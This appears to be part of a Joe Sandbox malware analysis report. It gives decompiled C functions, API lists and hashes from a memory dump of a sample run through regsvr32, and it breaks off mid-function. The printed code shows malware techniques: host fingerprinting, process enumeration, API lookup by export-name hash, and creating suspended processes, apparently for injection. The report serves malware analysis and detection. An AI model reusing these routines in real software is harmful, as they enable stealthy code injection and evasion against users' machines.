                                                                                                                                                                        0x05b9e258
                                                                                                                                                                        0x05b9e267
                                                                                                                                                                        0x05b9e27f
                                                                                                                                                                        0x05b9e286
                                                                                                                                                                        0x05b9e294
                                                                                                                                                                        0x05b9e29f
                                                                                                                                                                        0x05b9e2a0
                                                                                                                                                                        0x05b9e2a4
                                                                                                                                                                        0x05b9e2aa
                                                                                                                                                                        0x05b9e2ab
                                                                                                                                                                        0x05b9e2b3
                                                                                                                                                                        0x05b9e2b8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9e2c0
                                                                                                                                                                        0x05b9e2c4

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98BDE: RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 05B9DF64
                                                                                                                                                                        • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 05B9E057
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 05B9E05E
                                                                                                                                                                        • GetSystemMetrics.USER32(00001000), ref: 05B9E06E
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000000), ref: 05B9E123
                                                                                                                                                                          • Part of subcall function 05B9C8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,05B90000), ref: 05B9C96D
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 05B9E14E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AccountAllocateChangeCloseCurrentDirectoryErrorFindHeapLastLookupMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                        • API String ID: 377074508-2706916422
                                                                                                                                                                        • Opcode ID: 47000b7f1c8c65a9121b3fc09b87402233c1548554b53d7b6a9adf703b255997
                                                                                                                                                                        • Instruction ID: a3090d2e613ecb406f561fb37b055f9985d449bff850117ff0ee280ae4e3f286
                                                                                                                                                                        • Opcode Fuzzy Hash: 47000b7f1c8c65a9121b3fc09b87402233c1548554b53d7b6a9adf703b255997
                                                                                                                                                                        • Instruction Fuzzy Hash: AD915C75700605AFDB08EB74D84AFEABBE8FF09300F0041BAF51997241DB74B9558BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9C5EC Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E05B9C5EC(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E05B98D6D(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x5baf818; // 0x5d5f8b0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E05B99DF2(_t44, 0xad6);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E05B98BAF( &_v16);
				_t33 = E05B9A456(_t43);
				E05B99E51( &(_t43[E05B9A456(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E05B9A456(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E05B9E2C5(_t43, E05B9A456(_t43) + _t40, 0);
			}
















                                                                                                                                                                        0x05b9c5ec
                                                                                                                                                                        0x05b9c5f5
                                                                                                                                                                        0x05b9c601
                                                                                                                                                                        0x05b9c607
                                                                                                                                                                        0x05b9c609
                                                                                                                                                                        0x05b9c611
                                                                                                                                                                        0x05b9c61f
                                                                                                                                                                        0x05b9c624
                                                                                                                                                                        0x05b9c633
                                                                                                                                                                        0x05b9c63e
                                                                                                                                                                        0x05b9c64b
                                                                                                                                                                        0x05b9c665
                                                                                                                                                                        0x05b9c66a
                                                                                                                                                                        0x05b9c66c
                                                                                                                                                                        0x05b9c673
                                                                                                                                                                        0x05b9c683
                                                                                                                                                                        0x05b9c694
                                                                                                                                                                        0x05b9c69e
                                                                                                                                                                        0x05b9c6a6
                                                                                                                                                                        0x05b9c6ad
                                                                                                                                                                        0x05b9c6b0
                                                                                                                                                                        0x05b9c6cd

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000100), ref: 05B9C633
                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 05B9C665
                                                                                                                                                                          • Part of subcall function 05B99E51: _vsnwprintf.MSVCRT ref: 05B99E6E
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000114), ref: 05B9C69E
                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 05B9C6B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 455400327-0
                                                                                                                                                                        • Opcode ID: 9e331207818f9ef8216740036ededb28f45c569d6b678a148d658c3082b4bba1
                                                                                                                                                                        • Instruction ID: 2a636d0429eae3ec8cf333193ed84c04ef95f49c5060892fdfc8d1f2d4d18f7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e331207818f9ef8216740036ededb28f45c569d6b678a148d658c3082b4bba1
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D2127B2A50214BFDB14ABA4DC4EFEE77BCDF84210F1045B9F505D7181EA74BA448B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9B96A Relevance: 6.1, APIs: 4, Instructions: 66processCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E05B9B96A(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E05B98D6D( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x5baf818; // 0x5d5f8b0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}












                                                                                                                                                                        0x05b9b982
                                                                                                                                                                        0x05b9b984
                                                                                                                                                                        0x05b9b988
                                                                                                                                                                        0x05b9b98b
                                                                                                                                                                        0x05b9b98d
                                                                                                                                                                        0x05b9b992
                                                                                                                                                                        0x05b9b9a1
                                                                                                                                                                        0x05b9b9a9
                                                                                                                                                                        0x05b9b9bd
                                                                                                                                                                        0x05b9b9cd
                                                                                                                                                                        0x05b9b9d7
                                                                                                                                                                        0x05b9b9db
                                                                                                                                                                        0x05b9b9f8
                                                                                                                                                                        0x05b9b9ff
                                                                                                                                                                        0x05b9b9bf
                                                                                                                                                                        0x05b9b9bf
                                                                                                                                                                        0x05b9b9c5
                                                                                                                                                                        0x05b9b9ca
                                                                                                                                                                        0x05b9b9ca
                                                                                                                                                                        0x05b9b9bd
                                                                                                                                                                        0x05b9ba08

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 05B9B988
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 05B9B9B8
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,?), ref: 05B9B9EB
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 05B9B9F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2518216231-0
                                                                                                                                                                        • Opcode ID: 11a54a05957c7c66d782fd1bf2275aeeca18fd95a7cbb203c2bdb266736cad1f
                                                                                                                                                                        • Instruction ID: ee11562135351aba2af66f0b661ee91ff4bed59d891f8f0f918006b1eea59a70
                                                                                                                                                                        • Opcode Fuzzy Hash: 11a54a05957c7c66d782fd1bf2275aeeca18fd95a7cbb203c2bdb266736cad1f
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F1186722183019FC714DAA8F84AEBB7BECFF85260F140A79F565C7180EB20E54587A6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9EEBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 190 5b9eebb-5b9eed2 191 5b9ef2f 190->191 192 5b9eed4-5b9eefc 190->192 194 5b9ef31-5b9ef35 191->194 192->191 193 5b9eefe-5b9ef21 call 5b9a43d call 5b9e2c5 192->193 199 5b9ef23-5b9ef2d 193->199 200 5b9ef36-5b9ef4d 193->200 199->191 199->193 201 5b9ef4f-5b9ef57 200->201 202 5b9efa3-5b9efa5 200->202 201->202 203 5b9ef59 201->203 202->194 204 5b9ef5b-5b9ef61 203->204 205 5b9ef71-5b9ef82 204->205 206 5b9ef63-5b9ef65 204->206 208 5b9ef84-5b9ef85 205->208 209 5b9ef87-5b9ef93 LoadLibraryA 205->209 206->205 207 5b9ef67-5b9ef6f 206->207 207->204 207->205 208->209 209->191 210 5b9ef95-5b9ef9f GetProcAddress 209->210 210->191 211 5b9efa1 210->211 211->194
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9EEBB(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E05B9E2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E05B9A43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                        0x05b9eec4
                                                                                                                                                                        0x05b9eec6
                                                                                                                                                                        0x05b9eec9
                                                                                                                                                                        0x05b9eecc
                                                                                                                                                                        0x05b9eed2
                                                                                                                                                                        0x05b9ef2f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ef2f
                                                                                                                                                                        0x05b9eed4
                                                                                                                                                                        0x05b9eedf
                                                                                                                                                                        0x05b9eee2
                                                                                                                                                                        0x05b9eee7
                                                                                                                                                                        0x05b9eeec
                                                                                                                                                                        0x05b9eeef
                                                                                                                                                                        0x05b9eef1
                                                                                                                                                                        0x05b9eef4
                                                                                                                                                                        0x05b9eef7
                                                                                                                                                                        0x05b9eefc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eefe
                                                                                                                                                                        0x05b9eefe
                                                                                                                                                                        0x05b9ef10
                                                                                                                                                                        0x05b9ef1d
                                                                                                                                                                        0x05b9ef21
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ef23
                                                                                                                                                                        0x05b9ef26
                                                                                                                                                                        0x05b9ef27
                                                                                                                                                                        0x05b9ef2d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ef2d
                                                                                                                                                                        0x05b9ef44
                                                                                                                                                                        0x05b9ef49
                                                                                                                                                                        0x05b9ef4d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ef59
                                                                                                                                                                        0x05b9ef59
                                                                                                                                                                        0x05b9ef5b
                                                                                                                                                                        0x05b9ef5b
                                                                                                                                                                        0x05b9ef61
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ef67
                                                                                                                                                                        0x05b9ef6b
                                                                                                                                                                        0x05b9ef6f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ef6f
                                                                                                                                                                        0x05b9ef75
                                                                                                                                                                        0x05b9ef7d
                                                                                                                                                                        0x05b9ef82
                                                                                                                                                                        0x05b9ef85
                                                                                                                                                                        0x05b9ef85
                                                                                                                                                                        0x05b9ef87
                                                                                                                                                                        0x05b9ef8b
                                                                                                                                                                        0x05b9ef93
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ef97
                                                                                                                                                                        0x05b9ef9f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ef9f

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 05B9EF8B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05B9EF97
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: .dll
                                                                                                                                                                        • API String ID: 2574300362-2738580789
                                                                                                                                                                        • Opcode ID: 62b62b1cb054b079ef4944f37df321bd650328218560beca768f7d3936e0c64b
                                                                                                                                                                        • Instruction ID: abb173433d3eab430ddc3a10da00c60e0a3cb77d04e46be8915e3d2a19a5810c
                                                                                                                                                                        • Opcode Fuzzy Hash: 62b62b1cb054b079ef4944f37df321bd650328218560beca768f7d3936e0c64b
                                                                                                                                                                        • Instruction Fuzzy Hash: 37318F71A045159BDF28CF69C884BAEBBE9FF44244F2844BAD846E7351DB30F9418B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9C7F5 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 212 5b9c7f5-5b9c815 GetTokenInformation 213 5b9c85b 212->213 214 5b9c817-5b9c820 GetLastError 212->214 216 5b9c85d-5b9c861 213->216 214->213 215 5b9c822-5b9c832 call 5b98bde 214->215 219 5b9c838-5b9c84b GetTokenInformation 215->219 220 5b9c834-5b9c836 215->220 219->213 221 5b9c84d-5b9c859 call 5b98bf4 219->221 220->216 221->220
                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E05B9C7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E05B98BDE(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E05B98BF4( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                        0x05b9c7f8
                                                                                                                                                                        0x05b9c7f9
                                                                                                                                                                        0x05b9c800
                                                                                                                                                                        0x05b9c808
                                                                                                                                                                        0x05b9c80c
                                                                                                                                                                        0x05b9c815
                                                                                                                                                                        0x05b9c85b
                                                                                                                                                                        0x05b9c85b
                                                                                                                                                                        0x05b9c822
                                                                                                                                                                        0x05b9c82a
                                                                                                                                                                        0x05b9c82c
                                                                                                                                                                        0x05b9c832
                                                                                                                                                                        0x05b9c84b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9c84d
                                                                                                                                                                        0x05b9c852
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9c858
                                                                                                                                                                        0x05b9c834
                                                                                                                                                                        0x05b9c834
                                                                                                                                                                        0x05b9c834
                                                                                                                                                                        0x05b9c834
                                                                                                                                                                        0x05b9c832
                                                                                                                                                                        0x05b9c861

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,05B90000,00000000,00000000,?,05B9C876,00000000,00000000,?,05B9C89F), ref: 05B9C810
                                                                                                                                                                        • GetLastError.KERNEL32(?,05B9C876,00000000,00000000,?,05B9C89F,00001644,?,05B9DFCE), ref: 05B9C817
                                                                                                                                                                          • Part of subcall function 05B98BDE: RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,05B9C876,00000000,00000000,?,05B9C89F,00001644,?,05B9DFCE), ref: 05B9C846
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2499131667-0
                                                                                                                                                                        • Opcode ID: 3d745f89ec45376133371f628f35e879dbb0dbd45e32f6028bf80873930cbcbf
                                                                                                                                                                        • Instruction ID: 175ad02f621daf797686bf8ad2022720db5a4044a32d0a60ab3827c7a675194f
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d745f89ec45376133371f628f35e879dbb0dbd45e32f6028bf80873930cbcbf
                                                                                                                                                                        • Instruction Fuzzy Hash: 60018FB6600114BF8F289AA5DC89DFB7FADEE456A071004B9F905E2110EA61FE0086E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9BC84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 224 5b9bc84-5b9bcd3 call 5b98d6d * 2 CreateProcessW
                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E05B9BC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E05B98D6D(__edx, 0, 0x10);
				E05B98D6D( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





                                                                                                                                                                        0x05b9bc95
                                                                                                                                                                        0x05b9bca2
                                                                                                                                                                        0x05b9bcaa
                                                                                                                                                                        0x05b9bcc6
                                                                                                                                                                        0x05b9bccc
                                                                                                                                                                        0x05b9bcd3

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05B98D6D: memset.MSVCRT ref: 05B98D7F
                                                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 05B9BCC6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateProcessmemset
                                                                                                                                                                        • String ID: D
                                                                                                                                                                        • API String ID: 2296119082-2746444292
                                                                                                                                                                        • Opcode ID: 2f4c913025e975b094e9b46963fcdbeb70cdabdebd6de4c3cb20b7a2b6ca91c9
                                                                                                                                                                        • Instruction ID: 7d6c60e655ff934027c382c1274d3a71f063be36612db09b6b28c5496b456213
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f4c913025e975b094e9b46963fcdbeb70cdabdebd6de4c3cb20b7a2b6ca91c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 2CF030F16402087EFB20E6659C0BFBF7AACDB81710F500165BA05EB1C0EAA0AD0582A5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9D804 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 229 5b9d804-5b9d824 call 5b9d6dc 232 5b9d82a-5b9d849 call 5b9b557 229->232 233 5b9d955-5b9d958 229->233 236 5b9d84f-5b9d851 232->236 237 5b9d945-5b9d954 call 5b98bf4 232->237 238 5b9d933-5b9d943 call 5b98bf4 236->238 239 5b9d857-5b9d859 236->239 237->233 238->237 241 5b9d85c-5b9d85e 239->241 244 5b9d921-5b9d92d 241->244 245 5b9d864-5b9d883 call 5b98d6d call 5b9bc84 241->245 244->236 244->238 251 5b9d8e5-5b9d8e9 245->251 252 5b9d885-5b9d898 call 5b9d959 245->252 253 5b9d8eb-5b9d8ed 251->253 254 5b9d914-5b9d91b 251->254 252->251 259 5b9d89a-5b9d8b2 252->259 256 5b9d8ef-5b9d8f5 253->256 257 5b9d8fe-5b9d90e 253->257 254->241 254->244 256->257 257->254 262 5b9d8e2 259->262 263 5b9d8b4-5b9d8c9 GetLastError call 5b9da57 259->263 262->251 266 5b9d8cb-5b9d8d6 263->266 267 5b9d8de-5b9d8df FindCloseChangeNotification 263->267 269 5b9d8d9 266->269 270 5b9d8d8 266->270 267->262 269->267 270->269
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E05B9D804(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E05B9D6DC( &_v16);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x5baf81c; // 0x5d5fbe8
				_t7 = _t38 + 0xac; // 0x7fc38876
				E05B9B557( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E05B98BF4( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E05B98D6D( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E05B9BC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E05B9D959(E05B961C5,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x5baf818; // 0x5d5f8b0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E05B9DA57( &_v40);
									_t63 =  *0x5baf818; // 0x5d5f8b0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x5baf818; // 0x5d5f8b0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x5baf818; // 0x5d5f8b0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x5baf818; // 0x5d5f8b0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x5baf818; // 0x5d5f8b0
